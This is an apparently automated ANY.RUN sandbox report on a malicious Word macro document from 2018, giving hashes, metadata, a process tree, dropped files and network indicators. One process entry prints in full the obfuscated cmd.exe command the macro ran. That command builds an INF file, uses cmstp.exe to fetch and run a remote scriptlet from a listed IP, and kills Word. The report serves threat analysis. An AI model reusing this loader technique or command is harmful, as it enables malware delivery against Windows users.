analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

dab3c2d1f6ab22c2b47dee48c1932dfcc06be7030e5e346041532d749da0e6bb.doc

Full analysis: https://app.any.run/tasks/af8fe284-e66a-47ec-8cdf-6370e5a1e70b
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: November 08, 2018, 06:41:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Admin, Template: Normal.dotm, Last Saved By: cabane015 cabane015, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Wed Oct 17 02:44:00 2018, Last Saved Time/Date: Wed Nov 7 21:10:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 29, Security: 0
MD5:

89173C24DB6E9D1EDA4CE2BE04F25C59

SHA1:

3E598934BA1BCED054C77DD77E8AE1BDB6596B4E

SHA256:

DAB3C2D1F6AB22C2B47DEE48C1932DFCC06BE7030E5E346041532D749DA0E6BB

SSDEEP:

1536:/am5PVc8cT9hFxkWWqIcvdeF3Q/quClKq+y:jcT9lkTcvchQ/iK/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 32167.exe (PID: 2460)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • cmstp.exe (PID: 3840)

    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 3284)

    • Creates files in the user directory

      • cmd.exe (PID: 3284)
      • cmstp.exe (PID: 3840)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3624)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3624)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 32
Paragraphs: 1
Lines: 1
Company:
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 29
Words: 4
Pages: 1
ModifyDate: 2018:11:07 21:10:00
CreateDate: 2018:10:17 01:44:00
TotalEditTime: 2.0 minutes
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: cabane015 cabane015
Template: Normal.dotm
Comments: -
Keywords: -
Author: Admin
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
5
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs cmstp.exe taskkill.exe no specs 32167.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3624"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dab3c2d1f6ab22c2b47dee48c1932dfcc06be7030e5e346041532d749da0e6bb.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
3284cmd /V /C set "Q_66=s" && !Q_66!et "Q_27=i" && !Q_66!et "Q_30=A" && !Q_66!et "Q_11=N" && !Q_66!et "Q_18=d" && c!Q_30!ll !Q_66!et "Q_23=%!Q_30!PP!Q_18!!Q_30!T!Q_30!%" && c!Q_30!ll !Q_66!et "Q_56=%R!Q_30!!Q_11!!Q_18!OM%" && !Q_66!et "Q_75=!Q_23!\M!Q_27!cro!Q_66!oft\!Q_56!.txt" && !Q_66!et "Q_64="^" && (For %i in ("[ver!Q_66!ion]" "!Q_66!ignature=$Wi!Q_11!dow!Q_66! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "!Q_30!dvancedINF=2.5" "[DefaultIn!Q_66!tall_SingleU!Q_66!er]" "UnRegi!Q_66!terOCXs=Q_4" "[Q_4]" "%11%\%Q_53_1%%Q_53_2%%Q_53_3%,NI,%Q_69_1%%Q_69_2%%Q_69_3%%Q_69_4%%Q_69_5%%Q_69_6%%Q_69_7%%Q_69_8%%Q_69_9%%Q_69_10%%Q_69_11%%Q_69_12%%Q_69_13%%Q_69_14%%Q_69_15%%Q_69_16%%Q_69_17%" "[!Q_66!tring!Q_66!]" "Q_69_1=ht" "Q_69_2=tp" "Q_69_3=:/" "Q_69_4=/7" "Q_69_5=8." "Q_69_6=12" "Q_69_7=8." "Q_69_8=92" "Q_69_9=.1" "Q_69_10=5/" "Q_69_11=J7" "Q_69_12=Dl" "Q_69_13=HF" "Q_69_14=zD" "Q_69_15=_1" "Q_69_16=.t" "Q_69_17=xt" "Q_53_2=rO" "Q_53_1=sC" "Q_53_3=bJ" ) do @echo %~i)>"!Q_75!" && echo !Q_66!erv!Q_27!ceName=!Q_64! !Q_64!>>!Q_75! && echo !Q_66!hortSvcN!Q_30!me=!Q_64! !Q_64!>>!Q_75! && c!Q_30!ll !Q_66!et "Q_77=%WI!Q_11!!Q_18!IR%" && !Q_66!t!Q_30!rt "" !Q_77!\Sy!Q_66!tem32\cm!Q_66!tp.exe /s /ns "!Q_75!" && !Q_66!t!Q_30!rt "" /M!Q_27!N t!Q_30!skk!Q_27!ll /F /!Q_27!M w!Q_27!nwor!Q_18!.exeC:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3840C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\650.txt" C:\Windows\System32\cmstp.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.02.7600.16385 (win7_rtm.090713-1255)
4084tAskkill /F /iM winword.exeC:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2460"C:\Users\admin\32167.exe" C:\Users\admin\32167.execmstp.exe
User:
admin
Company:
Okta
Integrity Level:
MEDIUM
Description:
Developments Dsbugtrends Notifies
Total events
1 213
Read events
1 085
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
1
Text files
5
Unknown types
6

Dropped files

PID
Process
Filename
Type
3624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2ECB.tmp.cvr
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFCA2B53B56C625598.TMP
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1178BF800A7E9A315A240C34A220AC74
SHA256:D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7
3624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\785E1420.wmfwmf
MD5:0B18A2DBC2AF888FAF6B3998AC5FAF7C
SHA256:104B08A36B1D1C4E249BC6314ECAF94AC7A39EE453EF0E28C7363F50477B5DF8
3624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$b3c2d1f6ab22c2b47dee48c1932dfcc06be7030e5e346041532d749da0e6bb.docpgc
MD5:25020A3D6C81C925619E5BF9C877A1A0
SHA256:BED9847647620E663FF2D305B84B7BE0635A39B2E731F0440BD248AF7E4D4128
3624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FEBC5A1.wmfwmf
MD5:D17879ACB9E2604D5E6ED9B2B0D0C950
SHA256:0736B69348DA3F16210838C74F2B209DE9C6679AA4C4FC778F0D2FA5F2147E0A
3624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:A60424C1EEECBB49D67CC4ED6756C474
SHA256:A3B4138B04919F98B4802D1AF26B4BEF13E1B6B1931D8036DBB935A04C1FC77D
3624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E8403EFF-BCAF-412C-8F18-FD4E1930B72F}.tmpbinary
MD5:E369744C1B06BD25FE6EF73DE2AE0959
SHA256:5D0559A508665D64A2D50F558D4A876000D9FAEA826AC1A06CD1CEBFD063FCA8
3840cmstp.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\J7DlHFzD_1[1].txtxml
MD5:B10C94F8763CF2A18FA2F370B75CD7B6
SHA256:3FABB4580F8CFBE7CE56F1BD2C81FBA8BA38DE37A6C244D8D812C2EA542E925F
3284cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\650.txtini
MD5:210901254D442CC5F12FB3D5A29BD20B
SHA256:889FC28FB68A7156879FDE5481BEB7D850345904A31384F7BA7E3B2A38A6E216
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3840
cmstp.exe
GET
200
78.128.92.15:80
http://78.128.92.15/J7DlHFzD_1.txt
BG
xml
435 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3840
cmstp.exe
78.128.92.15:80
BelCloud Hosting Corporation
BG
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
3840
cmstp.exe
A Network Trojan was detected
MALWARE [PTsecurity] Squiblydoo Scriptlet
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
dab3c2d1f6ab22c2b47dee48c1932dfcc06be7030e5e346041532d749da0e6bb.doc